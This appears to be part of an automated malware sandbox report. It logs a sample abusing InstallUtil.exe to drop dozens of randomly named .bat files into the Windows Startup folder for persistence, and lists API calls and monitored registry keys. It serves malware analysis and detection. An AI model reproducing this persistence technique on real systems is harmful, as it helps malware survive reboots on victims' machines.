                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fg8k8vWyqYQx0o1Q7REQB6Y1.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYWpTGBqLRZXJWqN9GgXDdj4.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OksJDIkSk9vlxiJRjwqOvBEl.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TtQ59dJ4wCe89DD8HhCLHVsL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SbQ0yDAjokdr2V5NsofhcXiW.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e0F2LznfDHjVvc1ZIgjGBTfl.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OeHnvNY8j0wZg74Dxkl5QDpP.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4golg26ok3AkC3sMSeZWrCjO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RwdyRothHh6h93fgno23ysMA.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Iuq59gPB0g4RDHfNUajlbFgV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pc0adCuCUlFy3GCkyGaXGVPu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DPJLpwNaMsKVDJVgWZDaOfvk.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zCp3tcAX5zWepThqbpQcv3Vp.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYl1LYI6eLuyjSz20JB30bta.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XyNWXmNEbpbFhVSFSSJ7vqq7.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nHpplC9DOVhKNIOafnUoxiOu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rgr9vKFddOoI510FsaWGwfMd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fPKannmBo94NforWN8ticios.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q6S8ZsBC4fHsfjqey8ivFoc0.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mDRxpt9F25D9uZbeaJsspjpJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I3tGceZE6Qqz7aE3jOU5x1I6.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D2m62fF9GqYbEVP6vD9j2gxn.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UxkTO6SD1uCvL9HjSQh27cQ2.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a9NSv00SQMrlWyCzm4LVScNC.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfxQxKS1grbtlbpNfFfWg0ap.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moEvd4QfiLLNeBPf2fKoDASn.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asBZ8wuHHDAJRzMiLzRqRpQF.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\296oUdYAJhNvgZMPkFJ8Adyi.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xvAX15SR7EcYwQ5Q2lE9XfHz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ay5F8eKgrG8lBN1EHxrDj9a.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTuYRPLN8CgT4PB5QSqLONlo.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c0ucrp3AZ3Gqcb9XOi4ScJgO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QrETgkaDo3FkasRFDjM62pwJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EzK2ceYSUfPRcBaU9TkNfaTf.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sW90HVv4foncLJ8sPYYq235r.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IzmNdVOYIlxME3DLm9p1Wo8d.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\99X2MvCoXuwU3tttFIPQHwHV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zhgboFgxJ3Uc89yF9kUFaaB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z9adfxYPwrNPpZuQpK6e32ji.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HkWShiPP36Gpv4T24kJCvlou.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myITKbxjJgcKNVboC3VuR9An.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GPBZ3pTErTY3e9leZcqdjvav.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15kxO4axYz87tjx2F18yoEOB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYBowvhQTbfkpH7pEHtJjyDD.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c2kEPMEoB7jKNmSTYgGEhkC.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zaUcC3Pe1Igei62bzfib2Lgh.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QxDXJA7Z6xLrsw7t7yKiytsc.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k6mBzFjd7L6byeC8koGX6zwd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H6C8H8atjKBB32y6kz0KwOYz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reYWUrsGfXdjd232fVT1vkBW.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o6vfvXn1v5ljIkA7P0OwmNPJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\50beuzNCvSVaMrqSOp6IcdAU.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TSUKSzjiont3ubOypqhhZvXM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UQssKesI2uliQ7sIfwOvM5n9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yo2bOHtMzxxZL1bom4sGHQIE.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uMHc9fDef8Mu32GWDJP5t5su.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sEO8Bhf0d4Qrw9uimKYvdPbJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gf9K0uVqiu13maxJpiTH6V5K.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uPpk0o97VYSvo6hjGFH0TQqL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0IVfGkpQqbTNp1pNVMpRFWtI.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dJvuemiGicObX4Z30kroda9A.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kvtHxdKcRoDqPC1gLyjQuWO9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HLY28VSs4EqLmIyqaUOTirim.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRjwqgtLRilPROuQsr5g5A6Y.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G8ldCvYSMjZMx5lkoyQ6Gvn2.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lnNEauUE5ISjaPQmGBOxsDf3.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l1jIVrUtFS0lwUMqub3ii2o5.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bdNzZw7sNnZozpGAOggzJM47.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P4cTa1Ex4OzvKUtjHhTKpCVV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZD6INkMJGFiYItMqV3k0Ldkd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0vemidTikN0VMvyyqgfUpM9G.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JFT0ZMX7h2Vok8FUmP23B4xM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pYpnQnrOSHLqZa7RxVaX3LWM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtZyB8nLuAZWzY9cL759HQik.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfXUKQmfKzmnBZYpPm8oOw2u.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\91FjtG5d8Mu7R0hZFaoE9YuL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zCp3tcAX5zWepThqbpQcv3Vp.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYl1LYI6eLuyjSz20JB30bta.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asBZ8wuHHDAJRzMiLzRqRpQF.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IzmNdVOYIlxME3DLm9p1Wo8d.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zaUcC3Pe1Igei62bzfib2Lgh.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QxDXJA7Z6xLrsw7t7yKiytsc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UQssKesI2uliQ7sIfwOvM5n9.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yo2bOHtMzxxZL1bom4sGHQIE.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uMHc9fDef8Mu32GWDJP5t5su.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G8ldCvYSMjZMx5lkoyQ6Gvn2.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRjwqgtLRilPROuQsr5g5A6Y.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lnNEauUE5ISjaPQmGBOxsDf3.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P4cTa1Ex4OzvKUtjHhTKpCVV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZD6INkMJGFiYItMqV3k0Ldkd.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtZyB8nLuAZWzY9cL759HQik.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfXUKQmfKzmnBZYpPm8oOw2u.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\91FjtG5d8Mu7R0hZFaoE9YuL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pIWBIkjKkw1pyL67X81LlMuW.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fV1IOv3XzX0dw8cL656hlcGA.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVcxREh2h9e98HI2JvGb21V7.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6JhBFTT0ahcL4Jx3VU57fvL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gZtCFxlqR0Jhzrk0e43UouaM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fg8k8vWyqYQx0o1Q7REQB6Y1.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e0F2LznfDHjVvc1ZIgjGBTfl.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Iuq59gPB0g4RDHfNUajlbFgV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nHpplC9DOVhKNIOafnUoxiOu.bat
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe Code function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,14_2_00423C0C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004241DC IsIconic,SetActiveWindow,SetFocus,14_2_004241DC
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00424194 IsIconic,SetActiveWindow,14_2_00424194
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,14_2_00418384
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,14_2_0042285C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00417598 IsIconic,GetCapture,14_2_00417598
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,14_2_0048393C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00417CCE IsIconic,SetWindowPos,14_2_00417CCE
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,14_2_00417CD0
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,14_2_0041F118
Source: C:\Users\user\Desktop\file.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot (2 identical entries)
Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
